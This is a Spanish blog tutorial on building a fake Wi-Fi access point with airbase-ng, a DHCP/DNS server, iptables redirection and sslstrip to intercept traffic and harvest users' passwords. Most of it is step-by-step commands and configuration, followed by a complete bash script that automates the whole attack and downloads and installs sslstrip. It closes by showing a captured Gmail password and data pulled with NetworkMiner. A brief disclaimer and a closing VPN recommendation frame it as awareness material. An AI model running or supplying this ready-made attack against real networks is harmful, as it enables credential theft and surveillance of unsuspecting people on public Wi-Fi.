¿Qué es un punto de acceso?

Un punto de acceso inalámbrico o AP (Access Point) es un dispositivo que permite la conexión inalámbrica de un equipo móvil de cómputo (ordenador, tableta, smartphone) con una red. Generalmente los puntos de acceso tienen como función principal permitir la conectividad con la red, delegando la tarea de ruteo y direccionamiento a servidores, routers y switches. La mayoría de los AP siguen el estándar de comunicación 802.11 de la IEEE lo que permite una compatibilidad con una gran variedad de equipos inalámbricos.


¿Realmente navegamos seguros en redes wifi?

Vamos a demostrar la facilidad de montar un Punto de acceso falso (Fake AP) para capturar todo el tráfico y las credenciales de los usuarios, así como: webs que visitan, imágenes, contraseñas…
Todo lo realizado a continuación es a modo de aprendizaje, no nos hacemos responsable del mal uso que un usuario le pueda dar.


Requisitos

  • Adaptador Wifi (con soporte modo monitor).
  • Antena Wifi.
  • Linux Backtrack 5 (ISO o CD).
  • VirtualBox (Si usamos Backtrack en CD Live no seria necesario).
  • Conexión a Internet.

Software usado

  • Aircrack-ng (para crear punto de acceso falso con airbase-ng)
  • dhcp3-server (para asignar ips privadas a los clientes que se conecten) – Opcional
  • bind9 o dnsmasq (para resolver nombres de dominio)
  • iptables (para redireccionar el tráfico y hacer ip forward)
  • tar (para desempaquetar archivos tar)
  • python (para usar ssltrip)
  • ssltrip (para obtener credenciales)
  • tcpdump (para capturar el tráfico) – Opcional
  • WireShark (para analizar las capturas) – Opcional
  • NetworkMiner (para extraer datos de las capturas de forma automatizada)

Paso 1 – Iniciar máquina virtual o CD Live

Lo primero que necesitamos es crear una máquina virtual con la imagen ISO de Backtrack 5 o iniciar desde un CD Live.
Si usamos Backtrack 5 desde máquina virtual con VirtualBox debemos asociar el adaptador Wifi USB a la máquina virtual desde el menú:

Dispositivos >> Dispositivos USB >> “Nombre de nuestro adaptador Wifi USB”

VirtualBox - Dispositivo USB VirtualBox – Dispositivo USB

Backtrack 5 por defecto trae el idioma del teclado en inglés, por comodidad si lo queremos poner en español, ejecutamos este comando:

setxkbmap -layout es

Paso 2 – Instalar software necesario

Una vez iniciado Backtrack 5 necesitamos instalar un servidor DHCP (dhcp3-server) para asignar IPs privadas a los clientes y un servidor DNS (dnsmasq o bind) para la resolución de nombres de dominio.

Actualizamos los paquetes de los repositorios:

apt-get update

*Deben estar configurados previamente los repositorios en: /etc/apt/sources.list

Instalamos el servidor DHCP:

apt-get install dhcp3-server

Instalamos el servidor DNS (en este ejemplo hemos usado dnsmasq pero se podría usar bind9 también):

apt-get install dnsmasq

Paso 3 – Establecer el adaptador wifi en modo monitor

Nos aseguramos de tener el adaptador wifi conectado correctamente usando el comando:

iwconfig

Nos debería aparecer algo así:

iwconfig iwconfig

*Dependiendo del dispositivo puede que no aparezca wlan0 y se muestre con otro nombre. Para saber si es una interfaz wifi debe aparecer: 802.11.

Necesitamos establecer el adaptador Wifi en modo monitor para poder montar el punto de acceso.

Modo monitor:

airmon-ng start wlan0

ó

ifconfig wlan0 mode monitor

*Hay varias formas para poner el adaptador en modo monitor pero es recomendable usar airmon-ng ya que este nos crea una nueva interfaz llamada mon0, mon1, mon2

Paso 4 – Crear punto de acceso wifi falso

Una vez que tengamos nuestro adaptador wifi en modo monitor, creamos el punto de acceso, donde debemos especificar el nombre de la red, el canal wifi a usar y la interfaz en modo monitor (creada anteriormente). Crearemos una red abierta sin contraseña.

airbase-ng -P -C <segundos> -c <canal> --essid <nombre de la red> <interfaz modo monitor>

-P: Responde a todos los escaneos de redes wifi.
-C: Especifica cada cuantos segundos se envían beacons para anunciar el nombre de la red.
-c: Canal wifi.
–essid: Nombre de la red.

Por ejemplo:

airbase-ng -P -C 2 -c 6 --essid "Security Null" mon0

*Canal: 6
*Nombre de la red: Security Null
*Interfaz monitor: mon0

Una vez creado el punto de acceso falso, airbase-ng nos habrá creado una nueva interfaz llamada at0 (podemos verificarlo usando el comando ifconfig). Ahora asignamos una dirección IP y máscara de subred a esta nueva interfaz (esta interfaz es por la que pasará todo el tráfico de la red wifi).

ifconfig at0 <direccion ip> netmask <máscara de subred> up

Por ejemplo:

ifconfig at0 192.168.2.1 netmask 255.255.255.0 up

*No usar una dirección IP usada actualmente en vuestra red o no funcionará.

Paso 5 – Configurar e iniciar servidor DHCP

En este momento nuestro punto de acceso seria accesible y visible y nos podríamos conectar pero nos daría error obteniendo dirección IP al no tener un servidor DHCP que nos asigne una dirección IP privada.

Nota: Podemos prescindir de dhcp3-server y usar solo dnsmasq, ya que dnsmasq también tiene las funcionalidades de servidor DHCP. Si prefiere usar solo dnsmasq, ignore este paso y pase al siguiente.

Editamos el archivo:

/etc/dhcp3/dhcpd.conf

Con el siguiente contenido:

ddns-update-style none;
option domain-name-servers 192.168.2.1;
default-lease-time 60;
max-lease-time 72;
authoritative;
log-facility local7;
subnet 192.168.2.0 netmask 255.255.255.0 {
range 192.168.2.50 192.168.2.100;
option routers 192.168.2.1;
option domain-name-servers 192.168.2.1;
}

*Usamos un rango de IPs desde: 192.168.2.50 a 192.168.2.100, con lo cual solo podría haber 50 clientes conectados simultáneamente, es más que suficiente.

Si ya tenemos el servidor DHCP iniciado lo cerramos usando:

killall dhcpd3
/etc/init.d/dhcp3-server stop

Iniciamos el servidor DHCP indicándole el nuevo archivo de configuración (-cf) y la interfaz at0:

dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

Paso 6 – Configurar e iniciar servidor DNS

En este momento ya tenemos conectividad con la red wifi falsa pero no podríamos resolver nombres de dominio, para ello editamos el archivo:

/etc/dnsmasq.conf

Con el siguiente contenido:

listen-address=192.168.2.1,127.0.0.1

Si no queremos usar dhcp3-server, ya que dnsmasq también hace de servidor DHCP, en el archivo anteriormente editado (dnsmasq.conf) añadimos al final lo siguiente (si estamos usando dhcp3-server, ignorar esto):

interface=at0
dhcp-range=192.168.2.50,192.168.2.100,255.255.255.0,12h
log-dhcp
dhcp-authoritative

Si ya tenemos el servidor DNS iniciado lo cerramos usando:

killall dnsmasq
/etc/init.d/dnsmasq stop

Iniciamos el servidor DNS:

dnsmasq -a 192.168.2.1 -d -i at0 -z -C /etc/dnsmasq.conf -I lo

Paso 7 – Activar ip forward y aplicar reglas para iptables

Es necesario activar ip forward para reenviar paquetes desde una interfaz a otra, podemos activar esta opción de varias formas:

sysctl net.ipv4.ip_forward=1

ó

echo 1 > /proc/sys/net/ipv4/ip_forward

Debemos aplicar unas reglas en iptables para redirigir el tráfico procedente de la red wifi falsa a una interfaz con conexión a Internet.

iptables -t nat -F
iptables -t nat -A PREROUTING -i eth0 -j REDIRECT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

*En este ejemplo hemos usado una conexión a Internet por cable usando la interfaz eth0.
*La última regla es usada para ssltrip, donde le indicamos que redireccione todo el tráfico del puerto 80 al 8080 que será el que usemos en ssltrip.

Paso 8 – Esnifar o capturar tráfico de la red wifi (Opcional)

Opcionalmente podemos usar un esnifer para capturar todo el trafico generado en la red wifi.
Podemos usar tanto wireshark o tcpdump.

tcpdump:

tcpdump -w dump.pcap -i at0

-w: Nombre de la captura.
-i: Interfaz de la cual capturar el tráfico (at0 = Interfaz de nuestro punto de acceso falso).

Paso 9 – Instalar e iniciar SSLTrip

Por último solo nos quedaría instalar ssltrip. Esta herramienta actúa como un servidor proxy y se encarga de detectar cuando un usuario esta accediendo a una web a través de HTTPS y reemplaza HTTPS por HTTP, de esta forma capturamos el tráfico sin cifrar.

*Algunos servidores solo dejan entrar a través de HTTPS, con lo cual puede que no sirva para todos.

Descargamos la herramienta de la web del creador:

http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

Lo descomprimimos y desempaquetamos:

tar -xvzf sslstrip-0.9.tar.gz

Cambiamos de directorio a su carpeta:

cd sslstrip-0.9

Lo instalamos:

python ./setup.py install

Y finalmente lo ejecutamos:

sslstrip -w ../ssl.cap -l 8080

-w: Nombre del archivo donde se guardarán los datos capturados.
-l: Puerto donde escuchará ssltrip.


Automatizando el proceso

Para automatizar todo este proceso hemos creado un script en bash que lo realiza todo de forma automática y mucho más rápido:

#!/bin/bash

# Settings
wlan_interface="wlan0"
interface_monitor="mon0"
internet_interface="eth0"
essid="SecurityNull"
ap_channel=6
network="192.168.2.0"
ip="192.168.2.1"
mask="255.255.255.0"
ip_start="192.168.2.50"
ip_end="192.168.2.100"

if [ "$UID" -ne 0 ]
then
	echo "[!] Require ROOT!!"
	exit 0
fi

apt-get update
apt-get install dhcp3-server
#apt-get install bind9
apt-get install dnsmasq

# Interface Mode Monitor
airmon-ng stop $interface_monitor
airmon-ng start $wlan_interface
sleep 3

# Fake AP
killall airbase-ng
xterm -e airbase-ng -P -C 2 -c $ap_channel --essid "$essid" $interface_monitor &
sleep 3

ifconfig at0 $ip netmask $mask up
#ifconfig at0 $ip/24 up

# DHCP Server
echo "
ddns-update-style none;
option domain-name-servers $ip;
default-lease-time 60;
max-lease-time 72;
authoritative;
log-facility local7;
subnet $network netmask $mask {
range $ip_start $ip_end;
option routers $ip;
option domain-name-servers $ip;
}
" > /etc/dhcp3/dhcpd.conf
killall dhcpd3
/etc/init.d/dhcp3-server stop
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

# DNS Server
echo "
listen-address=192.168.2.1,127.0.0.1
#interface=at0
#dhcp-range=$ip_start,$ip_end,$mask,12h
#log-dhcp
#dhcp-authoritative
" > /etc/dnsmasq.conf
killall dnsmasq
/etc/init.d/dnsmasq stop
xterm -e dnsmasq -a $ip -d -i at0 -z -C /etc/dnsmasq.conf -I lo &

#killall bind9
#/etc/init.d/bind9 restart

# IP Routing
#sysctl net.ipv4.ip_forward=1
echo 1 > /proc/sys/net/ipv4/ip_forward

# IPTables
iptables -t nat -F
iptables -t nat -A PREROUTING -i $internet_interface -j REDIRECT
iptables -t nat -A POSTROUTING -o $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

# TCP Dump
xterm -e tcpdump -w dump.pcap -i at0 &

# SSL Trip
if [ ! -d "sslstrip-0.9" ]; then
	wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
	tar -xvzf sslstrip-0.9.tar.gz
fi
cd sslstrip-0.9
python ./setup.py install
sslstrip -w ../ssl.cap -l 8080

*Script desarrollado para Linux Backtrack 5, en Kali fue probado y no funciona, se tendría que modificar para adaptarlo.

Antes de ejecutarlo debemos darle permisos de ejecución:

chmod 755 fakeap.sh

Ejecutamos el script:

./fakeap.sh

*SE NECESITAN PERMISOS ‘ROOT’ PARA SU EJECUCIÓN.
*No requiere de ningún parámetro, para modificar alguna opción se deben modificar las variables del principio del script.

Una vez ejecutado el script se abrirán otras 3 ventanas donde se verán los clientes asociados, la asignación de direcciones IP privadas de DHCP

FakeAp FakeAp

A esperar…

Ahora solo nos tocaría esperar a que un cliente se conecte…
En la ventana donde tenemos ejecutándose airbase-ng nos aparecerán los clientes asociados.


Pruebas

Realizamos una prueba y creamos un punto de acceso falso, donde conectamos a una cuenta de gmail usando HTTPS, podemos ver la captura de ssltrip, y vemos que aparece la contraseña sin cifrar:

Captura SSLTrip Captura SSLTrip

También podemos ver información abriendo la captura con Wireshark:

Wireshark - Análisis Wireshark – Análisis

Pero como podemos ver usando herramientas como NetworkMiner, con esta herramienta podemos analizar una captura y extraer información sensible de forma más automatizada que usando Wireshark, como por ejemplo: host a donde nos hemos conectado, archivos e imágenes descargadas, sesiones, credenciales…

NetworkMiner - Hosts NetworkMiner – Hosts

NetworkMiner - Imágenes NetworkMiner – Imágenes

De esta forma no solo evitamos el HTTPS sino que obtendríamos contraseñas de redes sociales, páginas visitadas y mucha más información.


Conclusión

No existe seguridad al conectarse a redes abiertas (sin contraseña) o con cifrado WEP ya que cualquiera con conocimientos básicos podría estar esnifando el tráfico y ver todo lo que hacemos. Si deseamos estar seguros al conectarnos a este tipo de redes es recomendable usar una VPN como mínimo.

Si realmente te importa tu privacidad, jamás te conectes a una red abierta sin tomar las medidas de protección necesarias, ya que aunque ni siquiera naveguemos en la red, nuestro dispositivo comprueba actualizaciones, el correo electrónico, las redes sociales que tengamos abiertas en segundo plano o incluso si tenemos WhastApp, todo esto realizado de forma automática y quedaría registrado por un atacante.

FUENTES

http://es.wikipedia.org
http://www.thoughtcrime.org
http://safetybits.net